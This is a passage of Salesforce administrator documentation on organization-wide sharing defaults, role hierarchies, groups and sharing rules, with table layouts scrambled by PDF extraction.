organization-wide sharing defaults on accounts, contacts, contracts, assets, and cases to Private. This ensures that by
default your customers can view only their own data. You can still grant your Salesforce users Public Read/Write
access by creating sharing rules in which all internal users share with all internal users.

By default, Salesforce uses hierarchies, like the role or territory hierarchy, to automatically grant access of records to users
above the record owner in the hierarchy.

Use the Grant Access Using Hierarchies checkbox to disable access to records to users above the record owner in the hierarchy
for custom objects in Professional, Enterprise, Unlimited, and Developer Edition. If you deselect this checkbox for a custom
object, only the record owner and users granted access by the organization-wide defaults receive access to the records.

Note:

Starting in Summer ’12, custom objects can have separate organization-wide defaults for external and internal users,
enabling admins to set default access for external users to Private while still allowing Public Read/Write or Public
Read Only access for internal users. See Separate Organization-Wide Defaults for more information.

See Also:
Setting Your Organization-Wide Sharing Defaults
Sharing Default Access Settings
Default Organization-Wide Sharing Settings
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Setting Your Organization-Wide Sharing Defaults

Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Solutions, Service Contracts, Documents, Forecasts, Reports, and Dashboards are not available in Database.com

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To set default sharing access:

Note: Who Sees What: Organization-Wide Defaults (6:36 minutes)

Watch how you can restrict access to records owned by other users.

1. From Setup, click Security Controls > Sharing Settings.
2. Click Edit in the Organization-Wide Defaults area.
3. For each object, select the default access you want to use. If you have a portal enabled with separate organization-wide

defaults, see Separate Organization-Wide Defaults.
4. To disable automatic access using your hierarchies, deselect Grant Access Using Hierarchies for any custom object that

does not have a default access of Controlled by Parent.

Note: If Grant Access Using Hierarchies is deselected, users that are higher in the role or territory hierarchy
don’t receive automatic access. However, some users—such as those with the “View All” and “Modify All” object
permissions and the “View All Data” and “Modify All Data” system permissions—can still access records they
don’t own.

Updating the organization-wide defaults automatically runs sharing recalculation to apply any access changes to your records.
If you have a lot of data, the update can take longer. You’ll receive a notification email when the recalculation completes and
you can refresh the Sharing Settings page to see your changes. To view the update status, from Setup, click Security Controls
> View Setup Audit Trail.

Limitations

The organization-wide sharing default setting can’t be changed for some objects:

• Solutions are always Public Read/Write.
• Service contracts are always Private.
• The ability to view or edit a document, report, or dashboard is based on a user’s access to the folder in which it’s stored.
• Users can only view the forecasts of other users who are placed below them in the role hierarchy, unless forecast sharing

is enabled.
• When a custom object is on the detail side of a master-detail relationship with a standard object, its organization-wide

default is set to Controlled by Parent and it is not editable.
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• The organization-wide default settings can’t be changed from private to public for a custom object if Apex code uses the
sharing entries associated with that object. For example, if Apex code retrieves the users and groups who have sharing
access on a custom object Invoice__c (represented as Invoice__share in the code), you can’t change the object’s
organization-wide sharing setting from private to public.

See Also:
Sharing Default Access Settings
About Organization-Wide Sharing Defaults

Sharing Default Access Settings

Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Only Custom Objects are available in Database.com

User Permissions Needed

“Manage Users”To set default sharing access:

You can use organization-wide defaults to set the default level of record access for the following objects.

• Accounts and their associated contracts and assets

• Activities

• Calendars

• Campaigns

• Cases

• Contacts

• Custom objects

• Leads

• Opportunities

• Price books

• Service contracts

You can assign the following access levels to accounts, campaigns, cases, contacts, contracts, leads, opportunities, users, and
custom objects.

DescriptionField

A user can perform an action (such as view, edit, or delete) on
a contact based on whether he or she can perform that same
action on the record associated with it.

Controlled by Parent
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DescriptionField

For example, if a contact is associated with the Acme account,
then a user can only edit that contact if he or she can also edit
the Acme account.

Only the record owner, and users above that role in the
hierarchy, can view, edit, and report on those records.

For example, if Tom is the owner of an account, and he is
assigned to the role of Western Sales, reporting to Carol (who

Private

is in the role of VP of Western Region Sales), then Carol can
also view, edit, and report on Tom’s accounts.

All users can view and report on records but not edit them.
Only the owner, and users above that role in the hierarchy,
can edit those records.

Public Read Only

For example, Sara is the owner of ABC Corp. Sara is also in
the role Western Sales, reporting to Carol, who is in the role
of VP of Western Region Sales. Sara and Carol have full
read/write access to ABC Corp. Tom (another Western Sales
Rep) can also view and report on ABC Corp, but cannot edit
it.

All users can view, edit, and report on all records.

For example, if Tom is the owner of Trident Inc., all other
users can view, edit, and report on the Trident account.

Public Read/Write

However, only Tom can alter the sharing settings or delete
the Trident account.

All users can view, edit, transfer, and report on all records.
Only available for cases or leads.

For example, if Alice is the owner of ACME case number
100, all other users can view, edit, transfer ownership, and

Public Read/Write/Transfer

report on that case. But only Alice can delete or change the
sharing on case 100.

All users can view, edit, transfer, delete, and report on all
records. Only available for campaigns.

For example, if Ben is the owner of a campaign, all other users
can view, edit, transfer, or delete that campaign.

Public Full Access

Note:  To use cases effectively, set the organization-wide default for Account, Contact, Contract, and Asset to Public
Read/Write.

You can assign the following access levels to personal calendars.
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DescriptionField

Others can see whether the user is available at given times,
but can not see any other information about the nature of
events in the user’s calendar.

Hide Details

In addition to the sharing levels set by Hide Details, users can
insert events in other users’ calendars.

Hide Details and Add Events

Users can see detailed information about events in other users’
calendars.

Show Details

In addition to the sharing levels set by Show Details, users
can insert events in other users’ calendars.

Show Details and Add Events

Users can see detailed information about events in other users’
calendars, insert events in other users’ calendars, and edit
existing events in other users’ calendars.

Full Access

Note:  Regardless of the organization-wide defaults that have been set for calendars, all users can invite all other users
to events.

You can assign the following access levels to price books.

DescriptionField

All users can view price books and add them to opportunities.
Users can add any product within that price book to an
opportunity.

Use

All users can view and report on price books but only users
with the “Edit” permission on opportunities or users that have

View Only

been manually granted use access to the price book can add
them to opportunities.

Users cannot see price books or add them to opportunities.
Use this access level in your organization-wide default if you

No Access

want only selected users to access selected price books. Then,
manually share the appropriate price books with the
appropriate users.

You can assign the following access levels to activities.

DescriptionField

Only the activity owner, and users above the activity owner in
the role hierarchy, can edit and delete the activity; users with

Private

read access to the record to which the activity is associated can
view and report on the activity.
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DescriptionField

A user can perform an action (such as view, edit, transfer, and
delete) on an activity based on whether he or she can perform
that same action on the records associated with the activity.

For example, if a task is associated with the Acme account
and the John Smith contact, then a user can only edit that task

Controlled by Parent

if he or she can also edit the Acme account and the John Smith
record.

See Also:
Setting Your Organization-Wide Sharing Defaults

Default Organization-Wide Sharing Settings

Available in: Professional, Enterprise, Unlimited,Developer, and Database.com Editions.

Except for Custom Objects, all object types are not available in Database.com

The default organization-wide sharing settings are:

Default AccessObject

Public Read/WriteAccount

PrivateActivity

Public Read/WriteAsset

Hide Details and Add EventsCalendar

Public Full AccessCampaign

Public Read/Write/TransferCase

Controlled by ParentContact

Public Read/WriteContract

Public Read/WriteCustom Object

Public Read/Write/TransferLead

Public Read OnlyOpportunity

UsePrice Book
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Default AccessObject

PrivateService Contract

See Also:
About Organization-Wide Sharing Defaults
Setting Your Organization-Wide Sharing Defaults

Separate Organization-Wide Defaults

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  Separate Organization-Wide Defaults for External Users is available through a pilot program. For more
information on enabling this feature for your organization, contact salesforce.com.

Starting in Summer ’12, custom objects can have separate organization-wide defaults for internal and external users, therefore
simplifying your sharing rules configuration and improving recalculation performance.

External users include:

• Authenticated Website users

• Service Cloud Portal users

• Customer Portal users

• Partner Portal users

• Guest users

Previously, if your organization wanted Public Read Only or Public Read/Write access for internal users but Private for external
users, you would have to set the default access to Private and create a sharing rule to share records with all internal users.

With separate organization-wide defaults, you can achieve similar behavior by setting Default Internal Access to Public Read
Only or Public Read/Write and Default External Access to Private. Setting the default internal access as Public Read Only
or Public Read/Write also speeds up performance for reports, list views, searches, and API queries.

Enable separate organization-wide defaults from Setup by clicking Security Controls > Sharing Settings and clicking the
Enable External Sharing Model button.

Note:  The Default External Access level must be more restrictive or equal to the Default Internal Access level.
For example, you can have a custom object with Default External Access set to Private and Default Internal Access
set to Public Read Only .

If you want to disable separate organization-wide defaults, each of your custom objects must be set to the same Default
External Access and Default Internal Access levels before you can disable this feature. This button may be grayed out if at
least one of your custom objects has different internal and external access levels. If you have soft-deleted a custom object with
different external and internal defaults, you have to undelete the custom object to change the defaults to the same levels or
hard-delete the custom object before you can disable the feature.
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For details, see the Separate Organization-Wide Defaults for External Users tip sheet.

Controlling Access Using Hierarchies
Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Territories are not available in Database.com

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To set default sharing access:

“Manage Users”

AND

“Customize Application”

To change the Grant Access Using Hierarchies
option:

Beyond setting the organization-wide sharing defaults for each object, your organization can specify whether users have access
to the data owned by or shared with their subordinates in the hierarchy. For example, the role hierarchy automatically grants
record access to users above the record owner in the hierarchy. The Grant Access Using Hierarchies option in the
organization-wide defaults determines the access users have to records that they do not own, including records they do not
have sharing access to but someone below them in the hierarchy does. By default, the Grant Access Using Hierarchies
option is enabled for all objects, and it can only be changed for custom objects.

To control sharing access using hierarchies for any custom object, click Security Controls > Sharing Settings and Edit in the
Organization Wide Defaults section. Deselect Grant Access Using Hierarchies if you want to prevent users from
gaining automatic access to data owned by or shared with their subordinates in the hierarchies.

Implementation Notes

• Regardless of your organization's sharing settings, users can gain access to records they do not own through other means
such as user permissions like “View All Data,” sharing rules, or manual sharing of individual records.

• The Grant Access Using Hierarchies option is always selected on standard objects and is not editable.
• If you disable the Grant Access Using Hierarchies option, sharing with a role or territory and subordinates only

shares with the users directly associated with the role or territory selected. Users in roles or territories above them in the
hierarchies will not gain access.

• If your organization disables the Grant Access Using Hierarchies option, activities associated with a custom object
are still visible to users above the activity’s assignee in the role hierarchy.

• If a master-detail relationship is broken by deleting the relationship, the former detail custom object's default setting is
automatically reverted to Public Read/Write and Grant Access Using Hierarchies is selected by default.

• The Grant Access Using Hierarchies option affects which users gain access to data when something is shared
with public groups, personal groups, queues, roles, or territories. For example, the View All Users option displays group
members and people above them in the hierarchies when a record is shared with them using a sharing rule or manual
sharing and the Grant Access Using Hierarchies option is selected. When the Grant Access Using
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Hierarchies option is not selected, some users in these groups no longer have access. The following list covers the access
reasons that depend on the Grant Access Using Hierarchies option.

These reasons always gain access:
Group Member

Queue Member

Role Member

Member of Subordinate Role

Territory Member

Member of Subordinate Territory

These reasons only gain access when using hierarchies:
Manager of Group Member

Manager of Queue Member

Manager of Role

Manager of Territory

User Role Manager of Territory

Best Practices

• When you deselect Grant Access Using Hierarchies, notify users of the changes in report results that they can
expect due to losing visibility of their subordinates' data. For example, selecting My team's... in the View drop-down list
returns records owned by the user; it will not include records owned by their subordinates. To be included in this type of
report view, records from subordinates must be explicitly shared with that user by some other means such as a sharing rule
or a manual share. So, if no records are shared with you manually, the My... and My team's... options in the View drop-down
list return the same results. However, choosing the Activities with... any custom object report type when creating a custom
report returns activities assigned to you as well as your subordinates in the role hierarchy.

See Also:
Overview of Roles
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Overview of Roles
Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To create, edit, and delete roles:

“Manage Users”To assign users to roles:

Note: Who Sees What: Record Access via the Role Hierarchy (7:29 minutes)

Watch how you can open up access to records using the role hierarchy if your organization-wide defaults are more
restrictive than Public Read/Write.

Depending on your sharing settings, roles can control the level of visibility that users have into your organization’s data. Users
at any given role level can view, edit, and report on all data owned by or shared with users below them in the hierarchy, unless
your organization’s sharing model for an object specifies otherwise. Specifically, in the Organization-Wide Defaults related
list, if the Grant Access Using Hierarchies option is disabled for a custom object, only the record owner and users granted
access by the organization-wide defaults receive access to the object's records.

Working with Roles

To view and manage your organization's roles, from Setup, click Manage Users > Roles.

• Choose one of the following list view options:

Show in tree view
See a visual representation of the parent-child relationships between your roles. Click Expand All to see all roles, or
Collapse All to see only top-level roles. To expand or collapse an individual node, click the plus (+) or minus (-)
icon.

Show in sorted list view
See a list that you can sort alphabetically by role name, parent role (Reports to), or report display name. If your
organization has a large number of roles, use this view for easy navigation and filtering.

To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to
define your own custom views. To edit or delete any view you created, select it from the View drop-down list and
click Edit.

Show in list view
See a list of roles and their children, grouped alphabetically by the name of the top-level role. The columns are not
sortable. This view is not available for hierarchies with more than 1,000 roles.

• To create a role, click New Role or Add Role, depending whether you are viewing the list view or tree view of roles, then
edit the role fields as needed. You can create up to 500 roles for your organization.

• To edit a role, click Edit next to a role name, then update the role fields as needed.
• To delete a role, click Delete next to the role name.
• To assign other users to a role, click Assign next to the role name.
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• To view detailed information about a role, click a role name. If you are a Salesforce Knowledge user, you can modify
category visibility settings on the role detail page.

Tip:  To simplify user management in organizations with large numbers of users, enable delegated administrators to
manage users in specified roles and all subordinate roles.

Notes on Roles

• Every user must be assigned to a role, or their data will not display in opportunity reports, forecast roll-ups, and other
displays based on roles. If your organization uses territory management, forecasts are based on the territory hierarchy rather
than the role hierarchy.

• All users that require visibility to the entire organization should belong to the highest level in the hierarchy.
• It is not necessary to create individual roles for each title at your company, rather you want to define a hierarchy of roles

to control access of information entered by users in lower level roles.
• When you change a user’s role, any relevant sharing rules are evaluated to add or remove access as necessary.
• When an account owner is not assigned a role, the sharing access for related contacts is Read/Write, provided the

organization-wide default for contacts is not Controlled by Parent. Sharing access on related opportunities and cases is
No Access.

Assigning Users to Roles

Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To assign users to roles:

To quickly assign users to a particular role:

1. From Setup, click Manage Users > Roles.
2. Click Assign next to the name of the desired role.

Note:  You can also access this page by clicking Assign Users to Role from the Users in Role related list. Large
organizations should consider assigning roles via the SOAP API for efficiency.

3. Make a selection from the drop-down list to show the available users.
4. Select a user on the left, and click Add to assign the user to this role.

Note:  Removing a user from the Selected Users list deletes the role assignment for that user.

See Also:
Overview of Roles
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Role Fields

Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To create or edit roles:

The following fields (listed in alphabetical order) make up a role entry. Some of these fields may not be visible or editable
depending on your organization's permissions and sharing settings.

DescriptionField

Specifies whether users can access other users’ cases that are
associated with accounts the users own. This field is not visible

Case Access

if your organization’s sharing model for cases is Public
Read/Write.

Specifies whether users can access other users’ contacts that
are associated with accounts the users own. This field is not

Contact Access

visible if your organization’s sharing model for contacts is
Public Read/Write or Controlled by Parent.

The name used to refer to the role or title of position in any
user interface pages, for example, Western Sales VP.

Label

The name of the user who last modified this role's details, and
the date and time that the role was modified.

Modified By

Specifies whether users can access other users’ opportunities
that are associated with accounts the users own. This field is

Opportunity Access

not visible if your organization’s sharing model for
opportunities is Public Read/Write.

Indicates whether this role is associated with a partner account.
This field is available only when a Customer Portal or partner
portal is enabled for the organization.

If this checkbox is selected, you cannot edit the role. The
default number of roles in portal accounts is three. You can
reduce the number of roles or add roles to a maximum of three.

Partner Role

The unique name used by the API and managed packages.
The name must begin with a letter and use only alphanumeric

Role Name

characters and underscores. The name cannot end with an
underscore or have two consecutive underscores.

A role name that appears in reports. When editing a role, if
the Role Name is long, you can enter an abbreviated name
in this field.

Role Name as displayed on reports
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DescriptionField

These groups are automatically created and maintained. The
Role group contains all users in this role plus all users in roles

Sharing Groups

above this role. The Role and Subordinates group contains all
users in this role plus all users in roles above and below this
role in the hierarchy. The Role and Internal Subordinates
group (available if Customer Portals or partner portals are
enabled for your organization) contains all users in this role
plus all users in roles above and below this role, excluding
Customer Portal and partner portal users.

The role above this role in the hierarchy.This role reports to

See Also:
Overview of Roles

About Groups
Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Groups are sets of users. They can contain individual users, other groups, the users in a particular role or territory, or the users
in a particular role or territory plus all of the users below that role or territory in the hierarchy.

There are two types of groups:

• Public groups—Only administrators can create public groups. They can be used by everyone in the organization.

• Personal groups—Each user can create groups for their personal use.

You can use groups in the following ways:

• To set up default sharing access via a sharing rule

• To share your records with other users

• To specify that you want to synchronize contacts owned by others users

• To add multiple users to a Salesforce CRM Content library

• To assign users to specific actions in Salesforce Knowledge

See Also:
Group Member Types
Creating and Editing Groups
Viewing Group Lists
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Group Member Types

Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

The member types that are available vary depending on your Edition.

User Permissions Needed

“Manage Users”To create or edit a public group:

“Manage Users”To create or edit another user’s personal group:

When you create or edit a group, you can select the following types of members from the Search drop-down list. Depending
on your organization settings, some types may not be available.

DescriptionMember Type

All of your Customer Portal users. This is only available when
a Customer Portal is enabled for your organization.

Customer Portal Users

All of your partner users. This is only available when a partner
portal is enabled for your organization.

Partner Users

All of your own groups. This is only available when creating
other personal groups.

Personal Groups

All roles defined for your organization’s partner portal or
Customer Portal. This includes all users in the specified portal
role, except high-volume portal users.

Portal Roles

Note: A portal role name includes the name of the
account that it’s associated with, except for person
accounts, which include the user Alias.

All roles defined for your organization’s partner portal or
Customer Portal. This includes all of the users in the specified

Portal Roles and Subordinates

portal role plus all of the users below that role in the portal
role hierarchy, except for high-volume portal users.

Note: A portal role name includes the name of the
account that it’s associated with, except for person
accounts, which include the user Alias.

All public groups defined by your administrator.Public Groups

All roles defined for your organization. Adding a role to a
group includes all of the users in that role, but does not include
portal roles.

Roles
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DescriptionMember Type

Adding a role and its subordinate roles includes all of the users
in that role plus all of the users in roles below that role. This
doesn't include portal roles or users.

Roles and Internal Subordinates

Adding a role and its subordinate roles includes all of the users
in that role plus all of the users in roles below that role. This

Roles and Subordinates

is only available when no portals are enabled for your
organization.

Adding a role and its subordinate roles includes all of the users
in that role plus all of the users in roles below that role. This

Roles, Internal and Portal Subordinates

is only available when a partner or Customer Portal is enabled
for your organization. This includes portal users.

All users in your organization. This doesn't include portal
users.

Users

See Also:
About Groups

Creating and Editing Groups

Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To create or edit a public group:

“Manage Users”To create or edit another user’s personal group:

Only administrators can create and edit public groups, but anyone can create and edit their own personal groups.

To create or edit a group:

1. Click the control that matches the type of group:

• For personal groups, go to your personal settings and click My Personal Information or Personal—whichever one
appears. Then click My Groups. The Personal Groups related list is also available on the user detail page.

• For public groups, from Setup, click Manage Users > Public Groups.

2. Click New, or click Edit next to the group you want to edit.
3. Enter the following:

DescriptionField
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The name used to refer to the group in any user interface pages.Label

The unique name used by the API and managed packages.  The name
must begin with a letter and use only alphanumeric characters and

Group Name (public groups only)

underscores. The name cannot end with an underscore or have two
consecutive underscores.

Select Grant Access Using Hierarchies to allow automatic access to
records using your role or territory hierarchies. When selected, any

Grant Access Using Hierarchies (public
groups only)

records shared with users in this group are also shared with users higher
in the hierarchy.

Note: If Grant Access Using Hierarchies is deselected, users
that are higher in the role or territory hierarchy don’t receive
automatic access. However, some users—such as those with
the “View All” and “Modify All” object permissions and the
“View All Data” and “Modify All Data” system
permissions—can still access records they don’t own.

From the Search drop-down list, select the type of member to add. If
you don’t see the member you want to add, enter keywords in the search
box and click Find.

Search

Note:  For account owners to see child records owned by
high-volume portal users, they must be members of any portal
share groups with access to the portal users' data.

Select members from the Available Members box, and click Add to add
them to the group.

Selected Members

4. Click Save.

Note: When you edit groups, roles, and territories, sharing rules are usually automatically reevaluated to add or
remove access as needed. If these changes affect too many records at once, a message appears warning that the sharing
rules won't be automatically reevaluated, and you must manually recalculate them.

See Also:
About Groups
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Viewing Group Lists

Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To edit a public group:

1. Click the control that matches the type of group:

• For personal groups, in your personal settings, click My Personal Information or Personal—whichever one appears.
Then click My Groups.

• For public groups, from Setup, click Manage Users > Public Groups.

2. Click the name of a group in the Groups related list to display the group's detail page.

• To edit the group membership, click Edit.
• To delete the group, click Delete.
• To view group members, see the Group Members related list.
• To view group members and users who have equivalent access because they are higher in the role or territory hierarchy,

click View All Users to display the All Users in Group related list. Click View Group Members to return to the Group
Members related list.

See Also:
About Groups

Sharing Rules Overview
Account and contact sharing rules are available in: Professional, Enterprise, Unlimited, and Developer Editions

Account territory, case, lead, opportunity, and custom object sharing rules are available in: Enterprise, Unlimited, and
Developer Editions

Campaign sharing rules are available in Professional Edition for an additional cost, and Enterprise, Unlimited, and
Developer Editions

Only custom object sharing rules are available in Database.com

Note: Who Sees What: Record Access via Sharing Rules (4:27 minutes)

Watch how you can grant access to records using sharing rules.
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With sharing rules, you can make automatic exceptions to your organization-wide sharing settings for defined sets of users.
For example, use sharing rules to extend sharing access to users in public groups, roles, or territories. Sharing rules can never
be stricter than your organization-wide default settings. They simply allow greater access for particular users.

You can create the following types of sharing rules.

Set Default Sharing Access forBased onType

Accounts and their associated contracts,
assets, opportunities, cases, and
optionally, contacts

Account owner or other criteria,
including account record types or field
values

Account sharing rules

Accounts and their associated cases,
contacts, contracts, and opportunities

Territory assignmentAccount territory sharing rules

Individual campaign recordsCampaign owner or other criteria,
including campaign record types or field
values

Campaign sharing rules

Individual cases and associated accountsCase owner or other criteria, including
case record types or field values

Case sharing rules

Individual contacts and associated
accounts

Contact owner or other criteria, including
contact record types or field values

Contact sharing rules

Individual custom object recordsCustom object owner or other criteria,
including custom object record types or
field values

Custom object sharing rules

Individual leadsLead owner or other criteria, including
lead record types or field values

Lead sharing rules

Individual opportunities and their
associated accounts

Opportunity owner or other criteria,
including opportunity record types or
field values

Opportunity sharing rules

Note:

• You can’t include high-volume portal users in sharing rules because they don’t have roles and can’t be in public
groups.

• Developers can use Apex to programmatically share custom objects (based on record owners, but not other criteria).
This does not apply to User Sharing.

See Also:
Criteria-Based Sharing Rules Overview
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Criteria-Based Sharing Rules Overview

Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Accounts, Opportunities, Cases, and Contacts are not available in Database.com

Criteria-based sharing rules determine whom to share records with based on field values in records. For example, let’s say you
use a custom object for job applications, with a custom picklist field named “Department.” You can create a criteria-based
sharing rule that shares all job applications in which the Department field is set to “IT” with all IT managers in your organization.

Note:

• Although criteria-based sharing rules are based on values in the records and not the record owners, a role or
territory hierarchy still allows users higher in the hierarchy to access the records.

• You can’t use Apex to create criteria-based sharing rules. Also, criteria-based sharing cannot be tested using Apex.

• You can use the Metadata API to create criteria-based sharing rules starting in API version 24.0.

• You can’t include high-volume portal users in sharing rules because they don’t have roles and can’t be in public
groups.

You can create criteria-based sharing rules for accounts, opportunities, cases, contacts, leads, campaigns, and custom objects.
You can create up to 50 criteria-based sharing rules per object.

• Record types

• These field types:

◊ Auto Number

◊ Checkbox

◊ Date

◊ Date/Time

◊ Email

◊ Number

◊ Percent

◊ Phone

◊ Picklist

◊ Text

◊ Text Area

◊ URL

◊ Lookup Relationship (to user ID or queue ID)
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Note:  Text and Text Area are case-sensitive. For example, a criteria-based sharing rule that specifies “Manager” in
a text field won’t share records with “manager” in the field. To create a rule with several common cases of a word,
enter each value separated by a comma.

See Also:
Sharing Rules Overview

Sharing Rule Categories

Account and contact sharing rules are available in: Professional, Enterprise, Unlimited, and Developer Editions

Account territory, case, lead, and opportunity, sharing rules are available in: Enterprise, Unlimited, and Developer Editions

Campaign sharing rules are available in Professional Edition for an additional cost, and Enterprise, Unlimited, and
Developer Editions

Custom object sharing rules are available in: Enterprise, Unlimited, Developer, and Database.com Editions.

Partner Portals and Customer Portals are not available in Database.com

When you define a sharing rule, you can choose from the following categories in the owned by members of and Share
with drop-down lists. Depending on the type of sharing rule and the features enabled for your organization, some categories
may not appear.

Note: You can’t include high-volume portal users in sharing rules because they don’t have roles and can’t be in public
groups.

DescriptionCategory

All records owned by the queue, excluding records owned by individual members of the
queue. Available only in the owned by members of list.

Queues

All public groups defined by your administrator.

If a partner portal or Customer Portal is enabled for your organization, the All Partner
Users or All Customer Portal Users group displays. These groups includes all users allowed
to access your partner portal or Customer Portal, except for high-volume portal users.

Public Groups

All roles defined for your organization. This includes all of the users in the specified role.Roles

All roles defined for your organization’s partner portal or Customer Portal. This includes
all users in the specified portal role, except high-volume portal users.

A portal role name includes the name of the account that it’s associated with, except for
person accounts, which include the user Alias.

Portal Roles
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DescriptionCategory

All roles defined for your organization. This includes all of the users in the specified role
plus all of the users in roles below that role, including partner portal and Customer Portal
roles that contain users with a portal license type.

Portal roles are only included in this category if a partner portal or Customer Portal is
enabled for your organization.

Roles and Subordinates

The Roles, Internal and Portal Subordinates data set category is only available in your
organization after you create at least one role in the role hierarchy.

All roles defined for your organization’s partner portal or Customer Portal. This includes
all of the users in the specified portal role plus all of the users below that role in the portal
role hierarchy, except for high-volume portal users.

A portal role name includes the name of the account that it’s associated with, except for
person accounts, which include the user Alias.

Portal Roles and Subordinates

All roles defined for your organization. This includes all of the users in the specified role
plus all of the users in roles below that role, excluding partner portal and Customer Portal
roles.

This category only displays if a partner portal or Salesforce Customer Portal is enabled
for your organization.

Roles and Internal Subordinates

The Roles and Internal Subordinates data set category is only available in your organization
after you create at least one role in the role hierarchy and enable a portal.

All roles defined for your organization. This includes all of the users in the specified role
plus all of the users in roles below that role, including partner portal and Customer Portal
roles.

This category only displays if a partner portal or Salesforce Customer Portal is enabled
for your organization.

Roles, Internal and Portal
Subordinates

The Roles and Internal Subordinates data set category is only available in your organization
after you create at least one role in the role hierarchy and enable a portal.

All territories defined for your organization.Territories

All territories defined for your organization. This includes the specified territory plus all
territories below it.

Territories and Subordinates

See Also:
Sharing Rules Overview
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Creating Lead Sharing Rules

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To create sharing rules:

Lead sharing rules are based on the record owner or on other criteria, including record type and certain field values. You can
define up to 300 lead sharing rules, including up to 50 criteria-based sharing rules.

1. If you plan to include public groups in your sharing rule, confirm that the appropriate groups have been created.
2. From Setup, click Security Controls > Sharing Settings.
3. In the Lead Sharing Rules related list, click New.
4. Enter the Label Name and Rule Name. The Label is the sharing rule label as it appears on the user interface. The Rule

Name is a unique name used by the API and managed packages.
5. Select a rule type.
6. Depending on the rule type you selected, do the following:

• Based on record owner—In the owned by members of line, specify the users whose records will be shared:
select a category from the first drop-down list and a set of users from the second drop-down list (or lookup field, if
your organization has over 200 queues, groups, roles, or territories).

• Based on criteria—Specify the Field, Operator, and Value criteria that records must match to be included in the
sharing rule. The fields available depend on the object selected, and the value is always a literal number or string. Click
Add Filter Logic... to change the default AND relationship between each filter.

Note: To use a field that’s not supported by criteria-based sharing rules, you can create a workflow rule or
Apex trigger to copy the value of the field into a text or numeric field, and use that field as the criterion.

7. In the Share with line, specify the users who should have access to the data: select a category from the first drop-down
list and a set of users from the second drop-down list or lookup field.

8. Select the sharing access setting for users.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

9. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories
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Editing Lead Sharing Rules

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To edit sharing rules:

For sharing rules that are based on owner, you can edit only the sharing access settings. For sharing rules that are based on
other criteria, you can edit the criteria and sharing access settings.

1. From Setup, click Security Controls > Sharing Settings.
2. In the Lead Sharing Rules related list, click Edit next to the rule you want to change.
3. Change the Label and Rule Name if desired.
4. If you selected a rule that's based on owner, skip to the next step.

If you selected a rule that's based on criteria, specify the criteria that records must match to be included in the sharing rule.
The fields available depend on the object selected, and the value must be a literal number or string. Click Add Filter
Logic... to change the default AND relationship between each filter.

5. Select the sharing access setting for users.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

6. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories

402

Sharing Rules OverviewManage User Access to Data



Creating Account Sharing Rules

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To create sharing rules:

Account sharing rules can be based on the record owner or on other criteria, including record type and certain field values.
You can define up to 300 account sharing rules, including up to 50 criteria-based sharing rules.

1. If you plan to include public groups in your sharing rule, confirm that the appropriate groups have been created.
2. From Setup, click Security Controls > Sharing Settings.
3. In the Account Sharing Rules related list, click New.
4. Enter the Label Name and Rule Name. The Label is the sharing rule label as it appears on the user interface. The Rule

Name is a unique name used by the API and managed packages.
5. Select a rule type.
6. Depending on the rule type you selected, do the following:

• Based on record owner—In the owned by members of line, specify the users whose records will be shared:
select a category from the first drop-down list and a set of users from the second drop-down list (or lookup field, if
your organization has over 200 queues, groups, roles, or territories).

• Based on criteria—Specify the Field, Operator, and Value criteria that records must match to be included in the
sharing rule. The fields available depend on the object selected, and the value is always a literal number or string. Click
Add Filter Logic... to change the default AND relationship between each filter.

Note: To use a field that’s not supported by criteria-based sharing rules, you can create a workflow rule or
Apex trigger to copy the value of the field into a text or numeric field, and use that field as the criterion.

7. In the Share with line, specify the users who should have access to the data: select a category from the first drop-down
list and a set of users from the second drop-down list or lookup field.

8. Select a setting for Default Account, Contract and Asset Access.
9. In the remaining fields, select the access settings for the records associated with the shared accounts.

DescriptionAccess Setting

Users can’t view or update records, unless access is granted
outside of this sharing rule.

Private

(available for associated contacts, opportunities, and cases
only)

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write
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Note: Contact Access is not available when the organization-wide default for contacts is set to Controlled
by Parent.

10. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories

Editing Account Sharing Rules

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To edit sharing rules:

For sharing rules that are based on owner, you can edit only the sharing access settings. For sharing rules that are based on
other criteria, you can edit the criteria and sharing access settings.

1. From Setup, click Security Controls > Sharing Settings.
2. In the Account Sharing Rules related list, click Edit next to the rule you want to change.
3. Change the Label and Rule Name if desired.
4. If you selected a rule that's based on owner, skip to the next step.

If you selected a rule that's based on criteria, specify the criteria that records must match to be included in the sharing rule.
The fields available depend on the object selected, and the value must be a literal number or string. Click Add Filter
Logic... to change the default AND relationship between each filter.

5. Select a setting for Default Account, Contract and Asset Access.
6. In the remaining fields, select the access settings for the records associated with the shared accounts.

DescriptionAccess Setting

Users can’t view or update records, unless access is granted
outside of this sharing rule.

Private

(available for associated contacts, opportunities, and cases
only)

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write
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Note: Contact Access is not available when the organization-wide default for contacts is set to Controlled
by Parent.

7. Click Save.

See Also:
